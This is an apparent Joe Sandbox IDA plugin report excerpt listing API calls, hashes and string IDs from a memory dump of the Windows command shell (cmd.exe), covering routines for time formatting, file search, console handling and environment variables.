                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: [...]$ [..]$ [.]$...$:
                                                                                                                                            • API String ID: 0-1980097535
                                                                                                                                            • Opcode ID: 7de1c1da274fc61116a51b1acdb06d5a1044b55e165525b2ddb4f6393c450744
                                                                                                                                            • Instruction ID: 090d52fd49bd3f38343154bb1505f1e52a6c46525b93b59f0bc38198b1903fd7
                                                                                                                                            • Opcode Fuzzy Hash: 7de1c1da274fc61116a51b1acdb06d5a1044b55e165525b2ddb4f6393c450744
                                                                                                                                            • Instruction Fuzzy Hash: 2312E7702283429BD728DF24C889B6F77E9EF88345F00491DF989D7290EB74D869CB56
                                                                                                                                            APIs
                                                                                                                                            • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,0026E590,?,00002000), ref: 00246896
                                                                                                                                            • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 002468AA
                                                                                                                                            • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 002468BE
                                                                                                                                            • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 002468D2
                                                                                                                                            • realloc.MSVCRT ref: 0025A5E7
                                                                                                                                              • Part of subcall function 00248791: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00246906,0000001F,?,00000080), ref: 00248791
                                                                                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001F,?,00000080), ref: 00246907
                                                                                                                                            • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?), ref: 0024698F
                                                                                                                                            • memmove.MSVCRT(?,?,?), ref: 00246A86
                                                                                                                                            • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000000), ref: 00246AAF
                                                                                                                                            • realloc.MSVCRT ref: 00246ACA
                                                                                                                                            • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000001), ref: 00246AFE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Time$File$DateFormatSystem$realloc$DefaultInfoLocalLocaleUsermemmove
                                                                                                                                            • String ID: %02d%s%02d%s%02d$%s $%s %s
                                                                                                                                            • API String ID: 2927284792-4023967598
                                                                                                                                            • Opcode ID: 2e0440ee0a2ac0fd20ecd921a441c96cad1d0c5f5f4a06507d0a0103806ae58f
                                                                                                                                            • Instruction ID: 92921a3e8817393e93947786dbd47a40ffb8f9e1bee580db1dd75c073188e0b2
                                                                                                                                            • Opcode Fuzzy Hash: 2e0440ee0a2ac0fd20ecd921a441c96cad1d0c5f5f4a06507d0a0103806ae58f
                                                                                                                                            • Instruction Fuzzy Hash: 42C12872A202259BDF28DF50DC4DAEF77B8EB48301F5441AAE90AE7140EA719E94CF51
                                                                                                                                            APIs
                                                                                                                                            • FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,?,00000000,00000000,00000002,00000000,00000000,?,002559D0,?,00246054,-00001038,00000000,?,?), ref: 002558BB
                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,002559D0,?,00246054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 002558CD
                                                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000014,?,002559D0,?,00246054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00255944
                                                                                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,002559D0,?,00246054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0025594B
                                                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,002559D0,?,00246054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0025596C
                                                                                                                                            • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,002559D0,?,00246054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00255973
                                                                                                                                            • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,002559D0,?,00246054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0025598F
                                                                                                                                            • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,002559D0,?,00246054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 002559B6
                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,002559D0,?,00246054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0026160B
                                                                                                                                            • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,002559D0,?,00246054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00261618
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FindHeap$AllocCloseErrorFileLastProcess$FirstNext
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3609286125-0
                                                                                                                                            • Opcode ID: 358249d5446318b91f42f8e88c39d1755e1adc06adb816bcb09ac855fbb4c8d0
                                                                                                                                            • Instruction ID: 8c42b77b97086eef7507e12298e4d174c2e374b0a05e47c651e2b535483187cc
                                                                                                                                            • Opcode Fuzzy Hash: 358249d5446318b91f42f8e88c39d1755e1adc06adb816bcb09ac855fbb4c8d0
                                                                                                                                            • Instruction Fuzzy Hash: 39311734212601DFEB148F24FC2CB697BB5FB44336F244119E85A832E0DB359895DF55
                                                                                                                                            APIs
                                                                                                                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00267483
                                                                                                                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00267495
                                                                                                                                            • fprintf.MSVCRT ref: 002674BB
                                                                                                                                            • fflush.MSVCRT ref: 002674C9
                                                                                                                                            • TryAcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00288E04), ref: 002674E2
                                                                                                                                            • NtCancelSynchronousIoFile.NTDLL ref: 002674F8
                                                                                                                                            • ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00288E04), ref: 002674FF
                                                                                                                                            • _get_osfhandle.MSVCRT ref: 0026751C
                                                                                                                                            • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00267524
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalExclusiveLockSection$AcquireBufferCancelConsoleEnterFileFlushInputLeaveReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3139166086-0
                                                                                                                                            • Opcode ID: 280ff0029dbc1e2fc99fc25b986dd70735106d63d2a3866440f58811ffd4a7bb
                                                                                                                                            • Instruction ID: b723cdda1e53f085b19c5152330f162f5182f530cd86160c6f5a2aecad233d65
                                                                                                                                            • Opcode Fuzzy Hash: 280ff0029dbc1e2fc99fc25b986dd70735106d63d2a3866440f58811ffd4a7bb
                                                                                                                                            • Instruction Fuzzy Hash: 2A11B635129200AFEB256F60FC4EB693B38EB0475AF54001AFD06D50A1DF7589E5CF56
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00251D90: _wcsnicmp.MSVCRT ref: 00251E14
                                                                                                                                              • Part of subcall function 0024BC30: wcschr.MSVCRT ref: 0024BCA7
                                                                                                                                              • Part of subcall function 0024BC30: iswspace.MSVCRT ref: 0024BD1D
                                                                                                                                              • Part of subcall function 0024BC30: wcschr.MSVCRT ref: 0024BD39
                                                                                                                                              • Part of subcall function 0024BC30: wcschr.MSVCRT ref: 0024BD5D
                                                                                                                                              • Part of subcall function 00254BAF: _wcsnicmp.MSVCRT ref: 00254C1A
                                                                                                                                              • Part of subcall function 00254BAF: _wcsnicmp.MSVCRT ref: 00260B39
                                                                                                                                            • memset.MSVCRT ref: 00254975
                                                                                                                                            • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,-00000001,00000000,-00000001,00000104,00000000,00000001), ref: 00254ABC
                                                                                                                                            • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00254AF4
                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00254AFF
                                                                                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,00000000), ref: 00254B28
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcsnicmpwcschr$ErrorLast$AttributesFileiswspacememset
                                                                                                                                            • String ID: COPYCMD
                                                                                                                                            • API String ID: 1068965577-3727491224
                                                                                                                                            • Opcode ID: c1db03bd38b48ca564e3a479bd6ad3f64c46a91d4a2b2b5f148652dc3f423579
                                                                                                                                            • Instruction ID: 511e162cfc20888173380cfb86b4ce30c69bbbded50e0897772403ac683b083f
                                                                                                                                            • Opcode Fuzzy Hash: c1db03bd38b48ca564e3a479bd6ad3f64c46a91d4a2b2b5f148652dc3f423579
                                                                                                                                            • Instruction Fuzzy Hash: 02D10635A202168BCB28EF68DC95ABBB3B1EF58304F544569DD0AD7281EB30EDD5CB44
                                                                                                                                            APIs
                                                                                                                                            • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,00244DCB), ref: 00244D0E
                                                                                                                                              • Part of subcall function 00244D42: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 00244D66
                                                                                                                                              • Part of subcall function 00244D42: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 00244D8A
                                                                                                                                              • Part of subcall function 00244D42: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00244D95
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseOpenQueryValueVersion
                                                                                                                                            • String ID: %d.%d.%05d.%d
                                                                                                                                            • API String ID: 2996790148-3457777122
                                                                                                                                            • Opcode ID: 72604b3772c944ec9f590e16ab02bbc38323f83b6170a31ce497f9241b092820
                                                                                                                                            • Instruction ID: 8df653c5ccf4ff90863a52dff2127d50fb9601a257619f9b47a0603b7dd35f38
                                                                                                                                            • Opcode Fuzzy Hash: 72604b3772c944ec9f590e16ab02bbc38323f83b6170a31ce497f9241b092820
                                                                                                                                            • Instruction Fuzzy Hash: E3D02BB1B9022037D21C35251C5AE7B108CC6C8212784012BB901972C2D8A9AC3443B4
                                                                                                                                            APIs
                                                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00256826
                                                                                                                                            • RtlFreeHeap.NTDLL ref: 0025682D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Heap$FreeProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3859560861-0
                                                                                                                                            • Opcode ID: 35b740d6c9f0b9b848f4b794e3f7b3648be5de0bdd2b6cac77bd6c201776d26e
                                                                                                                                            • Instruction ID: c0482deb6ee843e738c165a4ea8c8e8f85339d96cfae7605542b8a87bdb37165
                                                                                                                                            • Opcode Fuzzy Hash: 35b740d6c9f0b9b848f4b794e3f7b3648be5de0bdd2b6cac77bd6c201776d26e
                                                                                                                                            • Instruction Fuzzy Hash: F7E06577621111A7CB206FCDA84C55AF7ADEB95726BA90029EA85B3200CA71AC1887D4
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcsicmp$iswspace
                                                                                                                                            • String ID: =,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                                                                            • API String ID: 759518647-875390083
                                                                                                                                            • Opcode ID: d58dff7357aba7cfe9ce3bc134c1950569c7e07fcdcaa642dd2952a24b6d801b
                                                                                                                                            • Instruction ID: 4a54615b25ec5b04bc854544f939146ebc3e6d0f45a29ef90f8808a7ad58c603
                                                                                                                                            • Opcode Fuzzy Hash: d58dff7357aba7cfe9ce3bc134c1950569c7e07fcdcaa642dd2952a24b6d801b
                                                                                                                                            • Instruction Fuzzy Hash: 7AA10735272203C6EB3C7F25BC5E73A2364AB41706F14442AF9464A5D1EEF488B9CB1A
                                                                                                                                            APIs
                                                                                                                                            • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,0026E590,00002000,?,00288BF0,00000000,?,?,00248F0D), ref: 0024EC51
                                                                                                                                            • _wcsicmp.MSVCRT ref: 0024EC77
                                                                                                                                            • _wcsicmp.MSVCRT ref: 0024EC8D
                                                                                                                                            • _wcsicmp.MSVCRT ref: 0024ECA3
                                                                                                                                            • _wcsicmp.MSVCRT ref: 0024ECB9
                                                                                                                                            • _wcsicmp.MSVCRT ref: 0024ECCF
                                                                                                                                            • _wcsicmp.MSVCRT ref: 0024ECE5
                                                                                                                                            • _wcsicmp.MSVCRT ref: 0024ECF7
                                                                                                                                            • _wcsicmp.MSVCRT ref: 0024ED0D
                                                                                                                                              • Part of subcall function 00249310: GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,0026E590,?,00002000), ref: 00249342
                                                                                                                                              • Part of subcall function 00249310: SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00249356
                                                                                                                                              • Part of subcall function 00249310: FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 0024936A
                                                                                                                                              • Part of subcall function 00249310: FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 0024937E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcsicmp$Time$File$System$EnvironmentLocalVariable
                                                                                                                                            • String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                                                                            • API String ID: 2447294730-2301591722
                                                                                                                                            • Opcode ID: 33d9f6310ad0fc1cb61bfde4a9424089d3259496be322e16f109a845ee00e62e
                                                                                                                                            • Instruction ID: 7d00b9272f99a20fcc5281a66fa5d105a28d2257dd349f767cf32b2f19d2de2f
                                                                                                                                            • Opcode Fuzzy Hash: 33d9f6310ad0fc1cb61bfde4a9424089d3259496be322e16f109a845ee00e62e
                                                                                                                                            • Instruction Fuzzy Hash: EF31FA3663A302EBBF1C5B21BC4EA6B275DFF46721B15441BF506D00C1EFA89430876A
                                                                                                                                            APIs
                                                                                                                                            • _wcsupr.MSVCRT ref: 00269CC8
                                                                                                                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000000,?), ref: 00269D22
                                                                                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00269D2A
                                                                                                                                            • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00269D3A
                                                                                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00269D50
                                                                                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00269D58
                                                                                                                                            • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00269D68
                                                                                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00269D7C
                                                                                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00269DDB
                                                                                                                                            • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00269DE2
                                                                                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,00000001,?), ref: 00269DF2
                                                                                                                                            • towupper.MSVCRT ref: 00269E13
                                                                                                                                              • Part of subcall function 0024A16C: _close.MSVCRT ref: 0024A19B
                                                                                                                                            • wcschr.MSVCRT ref: 00269E6A
                                                                                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00269E9B
                                                                                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00269EA9
                                                                                                                                              • Part of subcall function 0024DD98: _get_osfhandle.MSVCRT ref: 0024DDA3
                                                                                                                                              • Part of subcall function 0024DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0025C050), ref: 0024DDAD
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_close_get_osfhandle_wcsuprtowupperwcschr
                                                                                                                                            • String ID: <noalias>$CMD.EXE
                                                                                                                                            • API String ID: 2015057810-1690691951
                                                                                                                                            • Opcode ID: 2d5b2d5c8320a7f5f8aca1c108915df0811027c2385665ff1d01416f6b39f1a4
                                                                                                                                            • Instruction ID: 324a8c60dba8a3ff2d959ba084b917f63719a708f4c58f1dc8ccd58fef868507
                                                                                                                                            • Opcode Fuzzy Hash: 2d5b2d5c8320a7f5f8aca1c108915df0811027c2385665ff1d01416f6b39f1a4
                                                                                                                                            • Instruction Fuzzy Hash: 1E810676A212159BDF18AFB4EC486EEBBBDAF49710F14012AF801E7190DF7198D1CB61
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00249A11: _get_osfhandle.MSVCRT ref: 00249A1C
                                                                                                                                              • Part of subcall function 00249A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0024793A,00000104,?), ref: 00249A2B
                                                                                                                                              • Part of subcall function 00249A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00247908,00002374,-00000001), ref: 00249A47
                                                                                                                                              • Part of subcall function 00249A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00288E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00247908,00002374), ref: 00249A56
                                                                                                                                              • Part of subcall function 00249A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00247908,00002374), ref: 00249A61
                                                                                                                                              • Part of subcall function 00249A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00288E04,?,?,?,?,?,?,?,?,?,?,?,?,00247908,00002374,-00000001), ref: 00249A6A
                                                                                                                                            • _get_osfhandle.MSVCRT ref: 00247943
                                                                                                                                            • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00247908,00002374,-00000001), ref: 00247951
                                                                                                                                            • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00280AF0,000000A0,00000000,00000000,00000000,?,00000104,?), ref: 002479BE
                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,00000104,?), ref: 00247A1C
                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00247A27
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Console$ErrorLastLockShared_get_osfhandle$AcquireBufferFileHandleInfoModeReleaseScreenTypeWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2173784998-0
                                                                                                                                            • Opcode ID: 6a89dcff3218bcf1d182a058d92e9fd82ac3db65623502aca9a66db5992d4fce
                                                                                                                                            • Instruction ID: 9e2e1028e1d8a01b46b259229767b77c403597b30e3455e2d2d385bbfe81d7e5
                                                                                                                                            • Opcode Fuzzy Hash: 6a89dcff3218bcf1d182a058d92e9fd82ac3db65623502aca9a66db5992d4fce
                                                                                                                                            • Instruction Fuzzy Hash: 5371C175D11219EFDB18DFA4EC89ABEBBB9FF44302F14402AF906E2250DB749854CB51
                                                                                                                                            APIs
                                                                                                                                            • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000,?,?,?), ref: 00262931
                                                                                                                                            • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00262998
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentFormatMessageThread
                                                                                                                                            • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $P3$$ReturnHr$[%hs(%hs)]$[%hs]
                                                                                                                                            • API String ID: 2411632146-2650050279
                                                                                                                                            • Opcode ID: 4d29c8307e1db8d2ba0ef8ddc6d743b903b81ffb9262362cd9b6311461307eb4
                                                                                                                                            • Instruction ID: 785a9dbe6de88016f144c006b85b354db8a4fd6e3cc60dc3da04e805e0ee8ea3
                                                                                                                                            • Opcode Fuzzy Hash: 4d29c8307e1db8d2ba0ef8ddc6d743b903b81ffb9262362cd9b6311461307eb4
                                                                                                                                            • Instruction Fuzzy Hash: 47517471520B00EBDB349F688C09E67BBB8EF45B00F10445CF546A2162DAB2DAF8CF61
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 0025011A
                                                                                                                                              • Part of subcall function 0024E3F0: memset.MSVCRT ref: 0024E455
                                                                                                                                            • GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,-00000001,?,?,00000000), ref: 00250156
                                                                                                                                              • Part of subcall function 0024EC2E: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,0026E590,00002000,?,00288BF0,00000000,?,?,00248F0D), ref: 0024EC51
                                                                                                                                              • Part of subcall function 0024EC2E: _wcsicmp.MSVCRT ref: 0024EC77
                                                                                                                                              • Part of subcall function 0024EC2E: _wcsicmp.MSVCRT ref: 0024EC8D
                                                                                                                                              • Part of subcall function 0024EC2E: _wcsicmp.MSVCRT ref: 0024ECA3
                                                                                                                                              • Part of subcall function 0024EC2E: _wcsicmp.MSVCRT ref: 0024ECB9
                                                                                                                                              • Part of subcall function 0024EC2E: _wcsicmp.MSVCRT ref: 0024ECCF
                                                                                                                                              • Part of subcall function 0024EC2E: _wcsicmp.MSVCRT ref: 0024ECE5
